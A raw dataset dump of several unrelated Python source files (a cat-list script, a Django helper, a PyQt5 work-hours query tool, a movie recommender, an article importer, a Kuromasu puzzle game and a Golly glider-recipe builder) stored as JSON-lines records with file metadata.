Leave blank and press Enter to quit and write the list to an output file called cat-index.txt.')\n catName = input()\n cats = cats + [catName]\n if catName == '':\n break\n else:\n continue\n# this block of code takes the list and tells you the index of each cat name\nopen('cat-index.txt', 'w') # clears out contents of output file.\nfor i in range(len(cats)): # count how many cats are in list\n if cats[i] != '': # leaving the name blank and pressing enter creates a blank entry at the end of the list; this ignores the blank at the end of the list and prints the rest of the cat names. I could get the same result by deleting the -1 (last item) in the list \n print('Cat ' + cats[i] + ' is located at index ' + str(i) + '.') # prints list to file\n else: # when it runs out of cat names, print the following \n print('Those are all the cats. Nyan!')\nwhile True: # check to see if our actual cats are in the list\n if 'Liam' in cats:\n print('Why is Liam in the cat list?\\n')\n catCheck = ['Essie', 'Gary', 'Olive', 'Charlie', 'Mimi', 'Trixie']\n for i in range(len(cats)):\n if cats[i] != '':\n r = 0\n while r < int((len(catCheck))):\n try:\n cats.index(catCheck[r])\n except ValueError as e:\n print(e, file = open('./x-list.txt', 'a'))\n #exceptionList = []\n #exceptionList.append(e)\n #print(exceptionList)\n #print(exceptionList, file = open('./x-list.txt', 'a'))\n r = r + 1\n break \n \n \n \n # don't print exceptions as they occur. add them to a list and remove dupes and print list","sub_path":"DELETE method test.py","file_name":"DELETE method test.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"597072904","text":"from fb_post.models import Post\n\nfrom .validity import is_post_valid\n\nfrom .dict_post_details import get_dict_details_of_post\n\n#task - 13\ndef get_post(post_id):\n is_post_valid(post_id)\n\n post_obj = Post.objects\\\n .select_related('posted_by')\\\n .prefetch_related('comments', 'reaction', 'comments__reaction',\n 'comments__commented_by')\\\n .filter(id=post_id)\\\n .first()\n\n return get_dict_details_of_post(post_obj)\n","sub_path":"clean_code_submissions/clean_code_assignment_004/fb_post/utils/get_post.py","file_name":"get_post.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"552474969","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Time : 2023/1/30 12:44\n# @Author : ZANWEB\n# @File : DfDailyQueryCode in PyCharm\n# @IDE : PyCharm\n# @Function :\nimport os\nimport subprocess\nimport sys\n\nimport pandas as pd\nfrom PyQt5.QtCore import pyqtSlot, QDate, Qt\nfrom PyQt5.QtWidgets import QApplication, QMessageBox, QDialog, QTableWidgetItem\nfrom copy import deepcopy\n\nfrom DBbase.dbFunctions import df_t_emp_read, t_mhr_read_tables\nfrom Df_Daily_Query_ui import DailyQueryUI\n\n\n# from PyQt5.QtGui import Qt\n\nclass DailyQuery(QDialog, DailyQueryUI):\n def __init__(self, _user_info):\n super(DailyQuery, self).__init__()\n\n self.emp_group_id = 1\n self.sort_order = None\n self.emp = None\n self.df = None\n self.user_info = _user_info\n\n self.setup_ui(self)\n self.data_init_()\n self.connect_()\n\n def data_init_(self):\n date = QDate.currentDate()\n first_day_of_month = QDate(date.year(), date.month(), 1)\n last_day_of_month = first_day_of_month.addDays(date.daysInMonth() - 1)\n self.edit_start.setDate(first_day_of_month)\n self.edit_end.setDate(last_day_of_month)\n emp = 
df_t_emp_read(self.user_info, ['id', 'name'])\n self.emp = emp\n emp = ['|'.join([str(x['id']), x['name'].strip()]) for x in emp]\n self.edit_emp.addItems(emp)\n self.edit_emp.clearEditText()\n\n def connect_(self):\n self.btn_query.clicked.connect(self.query)\n self.btn_excel.clicked.connect(self.export_excel)\n self.edit_start.dateChanged.connect(self.date_changed)\n self.edit_table.horizontalHeader().sectionClicked.connect(self.header_clicked)\n self.r_btn_group.buttonClicked[int].connect(self.on_r_btn_group_clicked)\n\n @pyqtSlot(int)\n def on_r_btn_group_clicked(self, id_):\n self.emp_group_id = id_\n # print(self.emp_group_id)\n\n @pyqtSlot(int)\n def header_clicked(self, index):\n # header = self.edit_table.horizontalHeader()\n # self.sort_order = header.sortIndicatorOrder()\n if self.sort_order == Qt.AscendingOrder:\n self.sort_order = Qt.DescendingOrder\n else:\n self.sort_order = Qt.AscendingOrder\n self.edit_table.sortByColumn(index, self.sort_order)\n\n @pyqtSlot()\n def export_excel(self):\n desktop = os.path.join(os.path.expanduser(\"~\"), 'Desktop')\n file_path = os.path.join(desktop, \"output.xlsx\")\n self.df.to_excel(file_path, index=False, engine='openpyxl')\n subprocess.Popen(file_path, shell=True)\n\n @pyqtSlot()\n def date_changed(self):\n start = self.edit_start.date()\n last = start.addDays(start.daysInMonth() - 1)\n self.edit_end.setDate(last)\n\n @pyqtSlot()\n def query(self):\n # query\n result_ = self.get_mhr()\n # 这里加入计算出的辅助工的mhr\n # print(result_)\n have_vendors = [x for x in result_ if (x['Vendors'] and (x['Vendors'] != 'None'))]\n if have_vendors:\n for have_vendor in have_vendors:\n vendors_ = []\n if have_vendor['Vendors'].find(','):\n vendors_ = have_vendor['Vendors'].split(',')\n else:\n vendors_[0] = have_vendor['Vendors']\n for vendor_ in vendors_:\n name_ = [x['name'] for x in self.emp if x['id'] == int(vendor_)]\n tmp_ = deepcopy(have_vendor)\n tmp_['Operator'] = name_[0]\n tmp_['主/辅'] = '辅'\n tmp_['有/无承包商辅助'] = 'N'\n tmp_['Vendors'] = ''\n result_.append(tmp_)\n\n if result_:\n # emp = df_t_emp_read(self.user_info, ['id', 'name'])\n # print(emp, result_)\n # emp_map = {item['id']:item['name'] for item in emp}\n\n # 这里再加入正式工/外包工的区分\n emp_formal = [x['name'] for x in self.emp if str(x['id']).startswith('80')]\n emp_informal = [x['name'] for x in self.emp if str(x['id']).startswith('70')]\n result_formal = [x for x in result_ if x['Operator'] in emp_formal]\n result_informal = [x for x in result_ if x['Operator'] in emp_informal]\n self.df = None\n if self.emp_group_id == 1:\n self.df = pd.DataFrame(result_)\n elif self.emp_group_id == 2:\n self.df = pd.DataFrame(result_formal)\n else:\n self.df = pd.DataFrame(result_informal)\n\n self.df = self.df.sort_values(by=['Date', 'Operator'], axis=0, ascending=[True, True])\n # df['emp'] = df['emp'].replace(emp_map)\n # 清空表格\n self.edit_table.clear()\n self.edit_table.setRowCount(0)\n self.edit_table.setColumnCount(0)\n # self.edit_table.sortByColumn(False)\n # 填充表格\n self.edit_table.setRowCount(self.df.shape[0])\n self.edit_table.setColumnCount(self.df.shape[1])\n self.edit_table.setHorizontalHeaderLabels(self.df.columns)\n for i in range(self.df.shape[0]):\n for j in range(self.df.shape[1]):\n item = QTableWidgetItem(str(self.df.iloc[i, j]))\n item.setTextAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.edit_table.setItem(i, j, item)\n self.edit_table.resizeColumnsToContents()\n self.edit_table.resizeRowsToContents()\n # self.edit_table.sortItems(0, Qt.DescendingOrder)\n # 
self.edit_table.sortByColumn(True)\n else:\n QMessageBox.warning(self, '警告:', '没有数据!')\n\n def get_mhr(self):\n start_ = self.edit_start.date().toPyDate().strftime('%Y-%m-%d')\n end_ = self.edit_end.date().toPyDate().strftime('%Y-%m-%d')\n if self.edit_emp.currentText():\n emp_no_ = self.edit_emp.currentText().split('|')[0]\n else:\n emp_no_ = ''\n\n result = t_mhr_read_tables(self.user_info, start_, end_, emp_no_)\n return result\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n user_info = {\n 'server': '127.0.0.1\\\\stlsojsvr04',\n 'database': 'DFactory',\n 'account': 'zyq',\n 'password': 'zyq123'\n }\n window = DailyQuery(user_info)\n window.show()\n sys.exit(app.exec())\n","sub_path":"DfDailyQueryCode.py","file_name":"DfDailyQueryCode.py","file_ext":"py","file_size_in_byte":6446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"319337569","text":"import os.path\nimport unittest\n\nfrom integration import *\n\nclass TestTests(IntegrationTest):\n def __init__(self, *args, **kwargs):\n IntegrationTest.__init__(\n self, os.path.join(examples_dir, '07_tests'), *args, **kwargs\n )\n\n @skip_if_backend('msbuild')\n def test_test(self):\n self.build('test')\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/integration/test_tests.py","file_name":"test_tests.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"276751622","text":"import random\nfrom core import audio_ivec_sim\nfrom core.database_manager import trailer_seen, personality\nfrom core import get_table\nfrom core import movie_pers\nfrom pandas import Series\nimport numpy\nimport operator\nimport math\n\n\ndef pers_rec(user_id,num_of_rec,num_of_skip,pers_type):\n movies_seen=trailer_seen.TrailerSeen.query.filter_by(seen_by=user_id)\n movies_to_exclude = []\n for r in movies_seen:\n movies_to_exclude.append(r.imdb_id)\n\n pers_user = personality.Personality.query.filter_by(user_id=user_id).first().TIPI_TO_OCEAN()\n final_array = []\n\n if pers_type == \"users\":\n pers_others = personality.Personality.query.filter(personality.Personality.user_id != user_id)\n\n for pers_other in pers_others:\n d = get_distance(pers_user, pers_other.TIPI_TO_OCEAN())\n movies_seen=trailer_seen.TrailerSeen.query.filter_by(seen_by=pers_other.user_id, is_skipped=0)\n for r in movies_seen:\n # problem when multiple users rated the same movie, it should prob aggregate the score\n final_array.append((r.imdb_id, float((1/d) * float(r.rate)), r.rate))\n else:\n for row in movie_pers.itertuples():\n d = get_distance(pers_user, [row.openness, row.conscientiousness, row.extraversion, row.agreeableness, row.emotional_range])\n final_array.append((row.IMDB_ID, 1/d, d))\n\n dtype = [('IMDB_ID', 'S10'), ('PREDICTED_VOTE', float), ('IMDB_VOTES', int)]\n\n numpy_final = numpy.array(final_array, dtype=dtype)\n numpy_final = numpy.sort(numpy_final, order=['PREDICTED_VOTE'])\n numpy_final = numpy_final[::-1]\n\n all_table = get_table(\"all_table\")()\n all_table = all_table[~all_table[\"IMDB_ID\"].isin(Series(movies_to_exclude))]\n all_table.reset_index(drop=True, inplace=True)\n\n final = {}\n\n safe_iter = 0\n\n while (len(final) < num_of_rec) and (safe_iter < 20) and len(numpy_final) > (safe_iter + num_of_skip):\n rec = numpy_final[safe_iter + num_of_skip]\n\n movie = all_table[all_table[\"IMDB_ID\"] == rec[0]].copy()\n if len(movie.index):\n movie.reset_index(drop=True, inplace=True)\n 
movie = movie.iloc[0]\n movie[\"REC_TYPE\"] = \"PERS\"\n movie[\"PREDICTED_VOTE\"]=rec[1]\n\n z = movie.to_json()\n safe_iter += 1\n final.update({len(final): z})\n else:\n safe_iter += 1\n\n return final\n\ndef get_distance(a,b):\n return math.sqrt((a[0]-b[0])**2 + (a[1]-b[1])**2 + (a[2]-b[2])**2 + (a[3]-b[3])**2 + (a[4]-b[4])**2)\n","sub_path":"core/rec_engine/pers_rec.py","file_name":"pers_rec.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"173339986","text":"class Kuromasu:\n\n def __init__(self,archivo_tablero):\n self.tablero=[]\n for linea in archivo_tablero:\n self.tablero.append(linea.split())\n self.celdas_blancas=[]\n self.celdas_numeradas=[]\n self.celdas_negras=[]\n for i in range(len(self.tablero)):\n for j in range(len(self.tablero)):\n if celda_ocupada(self.tablero,i,j) and self.tablero[i][j]!='X':\n self.celdas_numeradas.append([i,j])\n elif self.tablero[i][j]=='X':\n self.celdas_negras.append([i,j])\n\n def dibujarTablero(self):\n print('\\n')\n for i in range(len(self.tablero)):\n for j in range(len(self.tablero)):\n if [i,j] in self.celdas_negras:\n print(' ',chr(9679),' ',end='')\n elif [i,j] in self.celdas_numeradas:\n print(' ',chr(9311+int(self.tablero[i][j])),' ',end='')\n else:\n print(' ',chr(9675),' ',end='')\n print('\\n')\n print('\\n')\n\n def agregarNegra(self,i,j):\n if [int(i),int(j)] in self.celdas_numeradas:\n print('esa celda no puede pintarse de negro pues contiene un numero')\n sleep(2.3)\n elif not validar_celda_tablero(self.tablero,int(i),int(j)):\n print('esa posicion no pertenece al tablero(fuera de limites)')\n sleep(2.3)\n elif negras_adyacentes(self.celdas_negras,int(i),int(j)):\n print('dos negras no pueden estar juntas ni horizontal ni verticalmente')\n sleep(2.3)\n elif [int(i),int(j)] in self.celdas_negras:\n print('esa celda ya fue pintada')\n sleep(2.3)\n else:\n self.celdas_negras.append([int(i),int(j)])\n\n def revisarSolucion_regla1(self):\n for i in range(len(self.tablero)):\n for j in range(len(self.tablero)):\n if self.tablero[i][j]!='0' and self.tablero[i][j]!='X':\n celda_solucionada=False\n soluciones_celda=traducir_combinaciones_posibles(combinaciones_posibles(self.tablero,int(self.tablero[i][j])-1,generar_decisiones(self.tablero,i,j)))\n soluciones_inviables_segun_negros=[]\n for solucion in soluciones_celda:\n for celda in solucion:\n if celda in self.celdas_negras:\n soluciones_inviables_segun_negros.append(solucion)\n break\n if soluciones_inviables_segun_negros==soluciones_celda:\n return False\n lista_posibles_negras=solucion_celda(self.tablero,i,j)\n for posible_combinacion in lista_posibles_negras:\n for negra in posible_combinacion:\n if negra not in self.celdas_negras:\n break\n celda_solucionada=True\n if not celda_solucionada:\n return False\n return True\n\n def revisarSolucion_regla4(self,posicion=[0,0],blancas=[],i=0):\n vectores=[[1,0],[0,1],[-1,0],[0,-1]]\n if i==0:\n self.blancas_simulacion_regla4=[]\n for i in range(len(self.tablero)):\n for j in range(len(self.tablero)):\n if [i,j] not in self.celdas_negras:\n self.blancas_simulacion_regla4.append([i,j])\n if len(self.blancas_simulacion_regla4)==1 or len(self.blancas_simulacion_regla4)==0:\n return True\n celda_comienzo=self.blancas_simulacion_regla4[0]\n for vector in vectores:\n if [celda_comienzo[0]+vector[0],celda_comienzo[1]+vector[1]] in self.blancas_simulacion_regla4:\n if 
self.revisarSolucion_regla4([celda_comienzo[0]+vector[0],celda_comienzo[1]+vector[1]],self.blancas_simulacion_regla4,i+1):\n return True\n else:\n if posicion in blancas:\n eliminar_de_lista(blancas,posicion)\n if blancas==[]:\n return True\n for vector in vectores:\n if [posicion[0]+vector[0],posicion[1]+vector[1]] in self.blancas_simulacion_regla4:\n if self.revisarSolucion_regla4([posicion[0]+vector[0],posicion[1]+vector[1]],self.blancas_simulacion_regla4,i+1):\n return True\n return False\n\n def resolver(self,celdas_numeradas=[],solucion=[],blancas=(),i=0):\n if i==0:\n celdas_numeradas=self.celdas_numeradas\n #print(celdas_numeradas)\n solucion=[[]]*len(celdas_numeradas)\n if celdas_numeradas==[]:\n #print('caso baso solucion:',solucion)\n return True\n #print(solucion_celda(self.tablero,celdas_numeradas[0][0],celdas_numeradas[0][1]))\n for combinacion in solucion_celda(self.tablero,celdas_numeradas[0][0],celdas_numeradas[0][1]):\n legal=True\n for celda in combinacion:\n #print('celda:',celda)\n if celda in blancas:\n legal=False\n else:\n for negras in solucion[:i]:\n #print('sol:',solucion)\n #print(negras)\n if negras_adyacentes(negras,celda[0],celda[1]):\n legal=False\n #print('ad')\n for negras in solucion[:i]:\n for negra in negras:\n #print ('negra:',negra)\n #print('comb:',combinacion)\n #print(blancas_segun_solucion(self.tablero,celdas_numeradas[0][0],celdas_numeradas[0][1],combinacion))\n if negra in blancas_segun_solucion(self.tablero,celdas_numeradas[0][0],celdas_numeradas[0][1],combinacion):\n #print('in')\n legal=False\n #print('\\n')\n if legal:\n #print('comb:',combinacion)\n #print('legal')\n #print(celdas_numeradas[1:])\n #print(i)\n #print('\\n')\n blancas_lista=list(blancas)\n #print('comb:',combinacion)\n #print('blancas:',blancas)\n #print('sol:',solucion)\n #print(i,'\\n')\n blancas_lista+=(blancas_segun_solucion(self.tablero,celdas_numeradas[0][0],celdas_numeradas[0][1],combinacion))\n solucion[i]=combinacion\n if self.resolver(celdas_numeradas[1:],solucion,tuple(blancas_lista),i+1):\n return solucion\n #print('fail')\n #return []\n\n def traducirSolucion(self,solucion):\n traduccion=[]\n for combinacion in solucion:\n for negra in combinacion:\n if negra not in traduccion:\n traduccion.append(negra)\n return traduccion\n\n def volverEstado_inicial(self):\n self.celdas_blancas=[]\n self.celdas_numeradas=[]\n self.celdas_negras=[]\n for i in range(len(self.tablero)):\n for j in range(len(self.tablero)):\n if celda_ocupada(self.tablero,i,j) and self.tablero[i][j]!='X':\n self.celdas_numeradas.append([i,j])\n elif self.tablero[i][j]=='X':\n self.celdas_negras.append([i,j])\n\n def limpiarTablero(self):\n self.celdas_negras=[]\n\n#clases\n#-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n#-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n#-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n#funciones\n\n\ndef eliminar_de_lista(lista,elemento): #elimina elemento de la lista, util para evitar errores si el elemento no esta\n if elemento in lista:\n #print('s')\n lista.pop(lista.index(elemento))\n\ndef celda_ocupada(tablero,i,j): #valida que la celda no este ocupada (True=ocupada, 
False=desocupada)\n if validar_celda_tablero(tablero,i,j):\n if tablero[i][j]!='0':\n return True\n return False\n\ndef validar_celda_tablero(tablero,i,j): #valida que la celda se encuentre dentro del tablero (True=dentro, False=fuera)\n if i<0 or j<0 or i>len(tablero)-1 or j>len(tablero[0])-1:\n return False\n return True\n\ndef negras_adyacentes(negras_actuales,i,j): #comprueba si las celdas adyacentes a [i,j] estan pintadas de negro\n if ([i+1,j] in negras_actuales) or ([i-1,j] in negras_actuales) or ([i,j+1] in negras_actuales) or ([i,j-1] in negras_actuales):\n return True\n return False\n\ndef generar_decisiones(tablero,i,j): #retorna todas las celdas que son \"alcanzables\" por la celda en la posicion i,j segun su numero.\n decisiones=[[],[],[],[]] #El formato son 4 listas para las 4 direcciones posibles, donde las celdas estan ordenadas segun cercania,\n if tablero[i][j]!='0': #siendo la primera la más cerca en tal direccion, y la ultima la mas lejana en dicha direccion\n for l in range(1,int(tablero[i][j])): #Debe ocuparse la funcion limpiar_lista_sublistas_vacias para eliminar las listas de direcciones\n if validar_celda_tablero(tablero,i+l,j): #en las que no haya posibilidades de movimiento\n decisiones[0].append([i+l,j])\n for l in range(1,int(tablero[i][j])):\n if validar_celda_tablero(tablero,i-l,j):\n decisiones[1].append([i-l,j])\n for l in range(1,int(tablero[i][j])):\n if validar_celda_tablero(tablero,i,j+l):\n decisiones[2].append([i,j+l])\n for l in range(1,int(tablero[i][j])):\n if validar_celda_tablero(tablero,i,j-l):\n decisiones[3].append([i,j-l])\n decisiones=limpiar_lista_sublistas_vacias(decisiones)\n return decisiones\n\ndef eliminar_celda_de_decision(celda_eliminar,decisiones): #elimina celda elegida de la lista de caminos, funcion necesaria por el formato de las decisiones\n for camino in decisiones:\n for celda in camino:\n if celda==celda_eliminar:\n indice_camino=decisiones.index(camino)\n decisiones[0],decisiones[indice_camino]=decisiones[indice_camino],decisiones[0]\n if len(decisiones)==1:\n return [decisiones[0][1:]]\n return [decisiones[0][1:]]+decisiones[1:]\n\ndef limpiar_lista_sublistas_vacias(lista): #elimina sublistas que sean vacias ([]) si estas existen\n while [] in lista:\n lista.pop(lista.index([]))\n return lista\n\ndef combinaciones_posibles(tablero,numero,lista_decisiones,combinacion_solucion=None,i=0,lista_combinaciones=[]): #retorna lista con tuplas que contienen las celdas que resuelven el numero,\n if i==0 and combinacion_solucion is None: #recibe:\n combinacion_solucion=[0]*(numero) #--->numero del que se buscan las combinaciones, restado en\n lista_combinaciones=[] # uno, pues numero-1 es la cantidad de celdas blancas\n if numero==0: #necesarias aparte de la que contiene al numero\n lista_combinaciones.append(tuple(combinacion_solucion)) #--->resultado de la funcion generar_decisiones en la posicion\n return #del numero\n for decision in lista_decisiones:\n combinacion_solucion[i]=decision[0]\n (combinaciones_posibles(tablero,numero-1,limpiar_lista_sublistas_vacias(eliminar_celda_de_decision(decision[0],lista_decisiones)),combinacion_solucion,i+1,lista_combinaciones))\n lista_decisiones=lista_decisiones[1:]\n return lista_combinaciones\n\ndef traducir_combinaciones_posibles(resultado_combinaciones_posibles): #retorna lista con listas que contienen las celdas que resuelven cada numero,\n comb=[] #o sea todas las posibilidades de casillas blancas para satisfacer la regla 1 del juego, recibe el resultado\n for tupla in 
resultado_combinaciones_posibles: #de la funcion combinaciones_posibles.\n l=list(tupla)\n comb.append(l)\n return comb\n\ndef solucion_celda(tablero,i,j): #retorna la combinacion de celdas negras que necesita una posicion para ser resuelta (lista con todas las combinaciones posibles)\n celdas_negras_cada_solucion=[]\n soluciones=(traducir_combinaciones_posibles(combinaciones_posibles(tablero,int(tablero[i][j])-1,generar_decisiones(tablero,i,j))))\n for solucion in soluciones:\n celdas_negras=[]\n i_min=min(solucion[n][0] for n in range(len(solucion)))\n if i_min>i:\n i_min=i\n if validar_celda_tablero(tablero,i_min-1,j):\n celdas_negras.append([i_min-1,j])\n if tablero[i_min-1][j]!='0' and tablero[i_min-1][j]!='X':\n continue\n i_max=max(solucion[n][0] for n in range(len(solucion)))\n if i_max<i:\n i_max=i\n if validar_celda_tablero(tablero,i_max+1,j):\n celdas_negras.append([i_max+1,j])\n if tablero[i_max+1][j]!='0' and tablero[i_max+1][j]!='X':\n continue\n j_min=min(solucion[n][1] for n in range(len(solucion)))\n if j_min>j:\n j_min=j\n if validar_celda_tablero(tablero,i,j_min-1):\n celdas_negras.append([i,j_min-1])\n if tablero[i][j_min-1]!='0' and tablero[i][j_min-1]!='X':\n continue\n j_max=max(solucion[n][1] for n in range(len(solucion)))\n if j_max<j:\n j_max=j\n if validar_celda_tablero(tablero,i,j_max+1):\n celdas_negras.append([i,j_max+1])\n if tablero[i][j_max+1]!='0' and tablero[i][j_max+1]!='X':\n continue\n celdas_negras_cada_solucion.append(celdas_negras)\n return celdas_negras_cada_solucion\n\n if len(juego.tablero)>=10:\n print('\\nSu tablero es de tamaño',len(juego.tablero),'por lo que la resolucion podría tardarse,\\n(ha sido testeado un tablero de 17x17, que se resolvio en aproximadamente\\n20 minutos y uno de 11x11 se resolvio en medio minuto aproximadamente) ')\n juego.limpiarTablero()\n solucion=(juego.traducirSolucion(juego.resolver()))\n for negra in solucion:\n juego.agregarNegra(negra[0],negra[1])\n print('\\nSolucion:')\n juego.dibujarTablero()\n juego.volverEstado_inicial()\n archivo_guardar=open(archivo,'w')\n for fila in juego.tablero:\n for columna in fila:\n archivo_guardar.write(columna)\n archivo_guardar.write(' ')\n archivo_guardar.write('\\n')\n print('Se ha guardado el tablero en su estado inicial, ¡vuelve pronto!\\n')\n jugar=False\n elif eleccion_menu=='4':\n archivo_guardar=open(archivo,'w')\n for i in range(len(juego.tablero)):\n for j in range(len(juego.tablero)):\n if [i,j] in juego.celdas_negras:\n archivo_guardar.write('X')\n archivo_guardar.write(' ')\n elif juego.tablero[i][j]!='0' and juego.tablero[i][j]!='X':\n archivo_guardar.write(juego.tablero[i][j])\n archivo_guardar.write(' ')\n else:\n archivo_guardar.write('0')\n archivo_guardar.write(' ')\n archivo_guardar.write('\\n')\n print('Se han guardado tus respuestas en el archivo. 
Gracias por jugar.\\n¡vuelve pronto!\\n')\n jugar=False\n elif eleccion_menu=='5':\n juego.volverEstado_inicial()\n elif eleccion_menu=='6':\n juego.limpiarTablero()\n else:\n juego.agregarNegra(celda.split(',')[0],celda.split(',')[1])\n","sub_path":"Tarea_3/KuromasuJuego.py","file_name":"KuromasuJuego.py","file_ext":"py","file_size_in_byte":25661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"563824315","text":"import io,json,os\n\nfolder = \"../data/articles\"\nfile = \"articles_20161017.json\"\ntags = [[\"title\"],[\"featured\"],[\"introtext\",\"content_intro\"],[\"fulltext\",\"content_main\"],[\"id\"],[\"created_by\",\"author\"],[\"access\",\"public\"],[\"publish_up\",\"publish_start\"],[\"publish_down\",\"publish_stop\"],[\"modified\",\"publish_modified\"],[\"created\",\"publish_created\"],[\"alias\"]]\nshortlist = {\"articles\":{},\"featured\":[],\"gallery\":[]}\n\n#read file\nwith io.open(file, 'r') as file:\n content = file.read()\ncontent = content[(content.index(\"[\")):]\ncontent = content.replace(\"\\\\r\",\"\").replace(\"\\\\n\",\"\")\ncontent = content.replace(\"btn-default\",\"btn-secondary\")\n\nlevel = 0\ncount = 0\nparts = []\nmaxid = 0\n\n#split in parts\nfor i in range(1, len(content)-1):\n if content[i] == \"{\":\n level = level + 1\n elif content[i] == \"}\":\n level = level - 1\n elif (content[i] == \",\") and (level == 0):\n count = count + 1\n continue\n \n while len(parts) <= count:\n parts.append(\"\")\n parts[count] += content[i]\n\n#parse\ntry:\n os.mkdir(folder)\nexcept WindowsError:\n print(\"no new folder\")\n\nfor i in range(0, len(parts)):\n\n article = json.loads(parts[i])\n print(article[\"id\"])\n maxid = max(maxid, int(article[\"id\"]))\n shortlist[\"articles\"][article[\"alias\"]] = int(article[\"id\"])\n if article[\"featured\"]!=\"0\":\n shortlist[\"featured\"].append(int(article[\"id\"]))\n newarticle = {\"comments\":True,\"permanent_alias\":True,\"system\":False,\"notified\":True}\n for key in article:\n for tag in tags:\n if key == tag[0]:\n if len(tag) == 1:\n newtag = tag[0]\n elif len(tag) == 2:\n newtag = tag[1]\n newarticle[newtag] = article[key]\n \n if newtag == \"id\" or newtag == \"author\":\n newarticle[newtag] = int(article[key])\n if newtag == \"public\":\n newarticle[newtag] = bool(article[key])\n if newtag == \"featured\":\n del newarticle[newtag]\n if newtag == \"alias\":\n newarticle[newtag] = article[key].replace(\"\\u00e4\",\"ae\").replace(\"\\u00f6\",\"oe\").replace(\"\\u00fc\",\"ue\")\n \n \n with open(folder + \"/\" + str(newarticle[\"id\"]).zfill(6) + \".json\",\"w+\") as f:\n f.write(json.dumps(newarticle))\n\nshortlist[\"count\"] = maxid \nwith open(folder + \"/index.json\",\"w+\") as f:\n f.write(json.dumps(shortlist)) ","sub_path":"extra/implementArticles.py","file_name":"implementArticles.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"309520926","text":"import golly as g \nimport copy\nfrom os import path\n\nglider_cells = g.parse(\"3o$o$bo!\")\nblock_cells = g.parse(\"2o$2o!\")\n\nclass RecipeConstructor(object):\n\t\n\tdef __init__(self):\n\t\tself.blockX = 0\n\t\tself.blockY = 0\n\t\tself.sequence = []\n\t\tself.recipe = []\n\t\tself.BlockMoveTableEven = {}\n\t\tself.BlockMoveTableOdd = {}\n\t\tself.WssCreator = []\n\t\tself.minD = 0\n\t\tself.maxY = 0\n\t\tself.maxX = 0\n\t\t\n\tdef Reset(self):\n\t\tself.blockX = 0\n\t\tself.blockY = 0\n\t\tself.sequence = 
[]\n\t\tself.recipe = []\n\t\t\n\tdef AddWss(self, idx):\n\t\tdelta = self.blockY - self.blockX\n\t\tdx = self.WssCreator[idx][0]\n\t\tdy = self.WssCreator[idx][1]\n\t\trec = self.WssCreator[idx][2]\n\t\t\n\t\tfor i in rec:\n\t\t\tself.recipe.append(i + delta)\n\t\t\n\t\tself.sequence.append((idx))\n\t\tself.blockX += dx\n\t\tself.blockY += dy\n\t\t\n\tdef Goto(self, x, y):\n\t\t\n\t\tdx = x - self.blockX\n\t\tdy = y - self.blockY\n\t\t\n\t\t#g.note(str((x, y, self.blockX, self.blockY, dx, dy)))\n\t\t\n\t\tif dx >= self.minD and dx <= self.maxX and abs(dy) <= self.maxY:\n\t\t\t\n\t\t\td = min(-3, dx)\n\t\t\tself.MoveBy(d, dx, dy)\n\t\t\t\n\t\telse: \n\t\t\t\n\t\t\tif dy != 0:\n\t\t\t\tdx_dy = int(self.maxY * float(dx) / float(abs(dy)) + 0.5)\n\t\t\telse:\n\t\t\t\tdx_dy = 0 \n\t\t\t\t\n\t\t\tif dy != 0 and abs(dy) > self.maxY and dx_dy <= self.maxX and dx_dy >= self.minD:\n\t\t\t\n\t\t\t\td = min(-3, dx_dy)\n\t\t\t\tself.MoveBy(d, dx_dy, self.maxY * (dy / abs(dy)))\n\t\t\t\tself.Goto(x, y)\n\t\t\t\t\n\t\t\telif dx < self.minD:\n\t\t\t\t\n\t\t\t\tdy_dx = int(self.minD * float(dy) / float(dx) + 0.5)\n\t\t\t\tself.MoveBy(self.minD, self.minD, dy_dx)\n\t\t\t\tself.Goto(x, y)\n\t\t\t\n\t\t\telif dx > self.maxX:\n\t\t\t\t\n\t\t\t\tdy_dx = int(self.maxX * float(dy) / float(dx) + 0.5)\n\t\t\t\tself.MoveBy(-3, self.maxX, dy_dx)\n\t\t\t\tself.Goto(x, y)\n\t\t\t'''\n\t\tif dx < -26:\n\t\t\tif dy >= 101:\n\t\t\t\tself.MoveBy(-23, -23, 101)\n\t\t\t\tself.Goto(x, y)\n\t\t\telif dy <= -101:\n\t\t\t\tself.MoveBy(-23, -23, -101)\n\t\t\t\tself.Goto(x, y)\n\t\t\telif abs(dy) >= abs(dx):\n\t\t\t\n\t\t\t\tif dy < 0:\n\t\t\t\t\tself.MoveBy(-23, -23, -23)\n\t\t\t\telse:\n\t\t\t\t\tself.MoveBy(-23, -23, 23)\n\t\t\t\t\t\n\t\t\t\tself.Goto(x, y)\n\t\t\telse:\n\t\t\t\tself.MoveBy(-23, -23, 1)\n\t\t\t\tself.Goto(x, y)\n\t\t\t\n\t\telif dx < -23:\n\t\t\tif dy >= 101:\n\t\t\t\tself.MoveBy(-11, -11, 101)\n\t\t\t\tself.Goto(x, y)\n\t\t\telif dy <= -101:\n\t\t\t\tself.MoveBy(-11, -11, -101)\n\t\t\t\tself.Goto(x, y)\n\t\t\telse: \n\t\t\t\tself.MoveBy(-11, -11, 1)\n\t\t\t\tself.Goto(x, y)\n\t\t\n\t\telif dx <= 50:\n\t\t\t\n\t\t\td = dx\n\t\t\tdelta = 0 \n\t\t\t\n\t\t\tif d > -3:\n\t\t\t\td = -3\n\t\t\t\n\t\t\tif d < 